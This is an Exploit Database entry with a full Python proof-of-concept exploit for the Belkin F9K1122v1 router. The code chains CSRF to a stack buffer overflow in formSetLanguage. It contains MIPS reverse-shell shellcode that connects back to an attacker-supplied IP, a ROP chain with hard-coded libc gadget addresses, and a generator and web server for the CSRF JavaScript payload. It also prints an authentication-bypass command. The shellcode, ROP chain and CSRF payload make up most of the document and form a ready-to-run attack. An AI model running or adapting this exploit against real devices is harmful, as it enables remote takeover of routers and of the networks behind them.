Belkin F9K1122v1 1.00.30 – Buffer Overflow (via Cross-Site Request Forgery)

• Exploit Database
• 101 阅读

• 作者： b1ack0wl
  日期： 2016-09-04
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40332/

• import socket, sys , base64, struct, string, urllib
  from getopt import getopt as GetOpt, GetoptError
  from uuid import getnode as get_mac
  import SimpleHTTPServer, SocketServer
  
  
  # TIMELINE #
  '''
  3/16/2016 - First Submission to Belkin [no response]
  5/3/2016 - Second Submission to Belkin [no response]
  6/4/2016 - Notification of 0day [vendor responded]
   Vendor Response: Our email system was broken but we want another 90 days.
  9/3/2016 - Notification of 0day sent to Belkin. [no response]
  9/4/2016 - The second 90 day extension is over.
  '''
  
  
  # Root cause analysis and all of that fun stuff
  '''
  This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
  The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
  XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
  There is no protection against CSRFs so I made this CSRF PoC. 
  
  
  The BoF Vulnerability:
  
  File Name: fmmgmt.c
  -------------------------------------------------------------
  void formSetLanguage(webs_t wp, char_t *path, char_t *query) 
  {
  [CUT]
  ...
  	if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
  		strcpy(tmpbuf, T("Set WEB language error!"));
  		goto setErr;
  	}
  	apmib_update(CURRENT_SETTING);
  setErr:	
  	urltmp = websGetVar(wp, T("webpage"), T(""));
  	sprintf(tmpbuf, "/%s", urltmp);
  -------------------------------------------------------------
  
  In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
  
  ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
  '''
  
  
  # GREETZ
  '''
  @AustinHackers - I love you all <3
  @Laughing_Mantis - Cause I said I would!
  @MisterCh0c - Keep on h4x0ring IoT products! 
  @IoTVillage - You guys rock!
  @HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
  @avicoder - cause you're awesome! :D
  @TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
  
  Everyone over at Praetorian - You guys are awesome <3.
  '''
  
  
  def usage():
  	print ""
  	print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
  	print "By: Elvis Collado [b1ack0wl]"
  	print ""
  	print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
  	print ""
  	print "\t-s Connect back IP [LHOST]"
  	print "\t-d Destination IP of Socket Listener [RHOST]"
  	print "\t-h Print this Help Menu"
  	print ""
  	sys.exit(1)
  
  
  # Hacky but whatever it gets the point across.
  if len(sys.argv) < 3:
  	usage()
  
  try:
  	(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
  except GetoptError, e:
  	usage()
  for opt, arg in opts:
  	if opt == "-s":
  		connectback_ip = arg.split(".")
  		for a in connectback_ip:
  			if int(a) == 0:
  				print "IP cannot have NULL Bytes :("
  				sys.exit(1)
  		
  		IP_1= struct.pack("<B",int(connectback_ip[0]))
  		IP_2= struct.pack("<B",int(connectback_ip[1]))
  		IP_3= struct.pack("<B",int(connectback_ip[2]))
  		IP_4= struct.pack("<B",int(connectback_ip[3]))
  	elif opt == "-d":
  		host = arg
  	elif opt == "-h":
  		usage()
  
  
  # Shellcode from bowcaster. 
  
  shellcode = string.join([
  	"\x24\x0f\xff\xfa", # li	t7,-6
  	"\x01\xe0\x78\x27", # nor	t7,t7,zero
  	"\x21\xe4\xff\xfd", # addi	a0,t7,-3
  	"\x21\xe5\xff\xfd", # addi	a1,t7,-3
  	"\x28\x06\xff\xff", # slti	a2,zero,-1
  	"\x24\x02\x10\x57", # li	v0,4183
  	"\x01\x01\x01\x0c", # syscall	0x40404
  	"\xaf\xa2\xff\xff", # sw	v0,-1(sp)
  	"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
  	"\x34\x0f\xff\xfd", # li	t7,0xfffd
  	"\x01\xe0\x78\x27", # nor	t7,t7,zero
  	"\xaf\xaf\xff\xe0", # sw	t7,-32(sp)
  
  	# Port 8080
  	"\x3c\x0e\x1f\x90", # lui	t6,0x1f90
  	"\x35\xce\x1f\x90", # ori	t6,t6,0x1f90
  	
  	# Store Port
  	"\xaf\xae\xff\xe4", # sw	t6,-28(sp)
  
  	# Big endian IP address 192.168.206.2
  	"\x3c\x0e"+IP_1+IP_2, # lui	t6,0x7f01
  	"\x35\xce"+IP_3+IP_4, # ori	t6,t6,0x101
  
  	"\xaf\xae\xff\xe6", # sw	t6,-26(sp)
  
  	"\x27\xa5\xff\xe2", # addiu	a1,sp,-30
  	"\x24\x0c\xff\xef", # li	t4,-17
  	"\x01\x80\x30\x27", # nor	a2,t4,zero
  	"\x24\x02\x10\x4a", # li	v0,4170
  	"\x01\x01\x01\x0c", # syscall	0x40404
  	"\x24\x0f\xff\xfd", # li	t7,-3
  	"\x01\xe0\x78\x27", # nor	t7,t7,zero
  	"\x8f\xa4\xff\xff", # lw	a0,-1(sp)
  	"\x01\xe0\x28\x21", # move	a1,t7
  	"\x24\x02\x0f\xdf", # li	v0,4063
  	"\x01\x01\x01\x0c", # syscall	0x40404
  	"\x24\x10\xff\xff", # li	s0,-1
  	"\x21\xef\xff\xff", # addi	t7,t7,-1
  	"\x15\xf0\xff\xfa", # bne	t7,s0,68 <dup2_loop>
  	"\x28\x06\xff\xff", # slti	a2,zero,-1
  	"\x3c\x0f\x2f\x2f", # lui	t7,0x2f2f
  	"\x35\xef\x62\x69", # ori	t7,t7,0x6269
  	"\xaf\xaf\xff\xec", # sw	t7,-20(sp)
  	"\x3c\x0e\x6e\x2f", # lui	t6,0x6e2f
  	"\x35\xce\x73\x68", # ori	t6,t6,0x7368
  	"\xaf\xae\xff\xf0", # sw	t6,-16(sp)
  	"\xaf\xa0\xff\xf4", # sw	zero,-12(sp)
  	"\x27\xa4\xff\xec", # addiu	a0,sp,-20
  	"\xaf\xa4\xff\xf8", # sw	a0,-8(sp)
  	"\xaf\xa0\xff\xfc", # sw	zero,-4(sp)
  	"\x27\xa5\xff\xf8", # addiu	a1,sp,-8
  	"\x24\x02\x0f\xab", # li	v0,4011
  	"\x01\x01\x01\x0c"# syscall	0x40404
  	], '')
  
  
  
  
  # getRect() son
  huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D
  huge_string += "!" # Filler
  huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep
  huge_string += "\x43\x43\x43\x43" # s1 but after sleep it's just padding
  huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9
  huge_string += "\x44\x44\x44\x44" * 6 # padding
  huge_string += struct.pack(">L",0x31313131) # s0 -Sleep
  huge_string += struct.pack(">L",0x2aafc840) # s1
  huge_string += struct.pack(">L",0x34343434) # s2
  huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA
  huge_string += "\x45\x45\x45\x45" * 9 # Padding
  huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA
  huge_string += "\x46\x46\x46\x46" * 10
  huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled.
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += struct.pack(">L",0x2739e8b8) 
  huge_string += "\x47\x47\x47\x47" # Padding becomes NULL
  huge_string += shellcode # shellcode start
  
  
  '''
  
  NOTES
  
  libc = 0x2aad0000
  
  0x2aafc840 (Sleep)
  
  Gadget 1
  
  0x2aafc840: movet9,s0 # Sleep
  0x2aafc844: jalrt9 # call sleep. The rest of the instructions will not block out payload and are not included.
   
  
  Gadget 2 
  
  0x2aaf9f38: movet9,s1 # Addr to Gadget 3
  0x2aaf9f3c: lwra,52(sp)
  0x2aaf9f40: lws3,48(sp)
  0x2aaf9f44: lws2,44(sp)
  0x2aaf9f48: lws1,40(sp)
  0x2aaf9f4c: lws0,36(sp)
  0x2aaf9f50: jrt9 # Call Gadget 3
  
  
  
  Gadget 3
  
  0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0
  0x2aaf980c: lwra,52(sp) # load Ret addr
  0x2aaf9810: jrra # ret
  
  
  
  Gadget 4 (Stack Exec)
  
  0x2aaf97fc: movet9,a0 # move A0 which contains the address of the stack
  0x2aaf9800: swv0,24(sp)
  0x2aaf9804: jalrt9 # Jump to the stack
  0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0
  
  '''
  
  
  csrf_file = open('a.js', 'wb')
  params = urllib.urlencode({'webpage': huge_string}) # Vulnerable parameter
  destination_addr = 'x.open("POST", "http://' + host + '/goform/formSetLanguage"' + ',true);\n' # Vulnerable Endpoint that does not require authentication
  
  # Write CSRF PoC 
  csrf_file.write('function getrekt(){')
  csrf_file.write('var x = new XMLHttpRequest();\n')
  csrf_file.write(destination_addr)
  csrf_file.write('x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n')
  csrf_file.write('x.send("' + params + '");')
  csrf_file.write('}\ngetrekt();')
  
  # Close file since we're doing writing to it.
  csrf_file.close()
  
  
  # Now Host the CSRF File
  mac = get_mac()
  PORT = 80 # This is why superuser rights are needed
  Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
  httpd = SocketServer.TCPServer(("", PORT), Handler)
  mac_addr = ':'.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2))
  print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT
  print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m" 
  httpd.serve_forever()
  

  Python

  Copy